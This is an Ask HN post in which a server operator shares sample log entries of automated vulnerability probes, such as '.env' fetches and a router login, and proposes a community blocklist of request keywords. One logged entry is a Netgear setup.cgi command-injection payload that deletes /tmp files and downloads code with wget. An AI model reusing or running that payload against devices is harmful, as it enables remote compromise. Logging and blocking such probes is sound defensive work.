Ask HN: Can we collaborate on a IP Address or Regex blacklist?

Hear me out.

I've recently started logging pings to my services, A LOT of servers ping me constantly checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this.

{ "offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "125.47.68.164" },

{ "offense": ".env", "ipAddress": "52.224.55.198" },

{ "offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+https://ift.tt/3wziuvW", "ipAddress": "115.58.115.18" }

Maybe we don't filter by ip address, and instead filter requests based on known strings (or regex). That's what i'm currently doing. Ex. If request includes '.env'. Blocked!

I'd love to implement a more aggressive strategy. Rather than a reactive one. I'm currently finding myself going through server logs, and adding new 'keywords' to the 'banned list'.

Like a 'ad blocklist' we can use as middleware in our HTTP applications.

If something exists already, kindly point me to a Github.

---

Comments URL: https://news.ycombinator.com/item?id=26719964

Points: 11

# Comments: 16

from Hacker News: Front Page https://ift.tt/3t9tvSB
via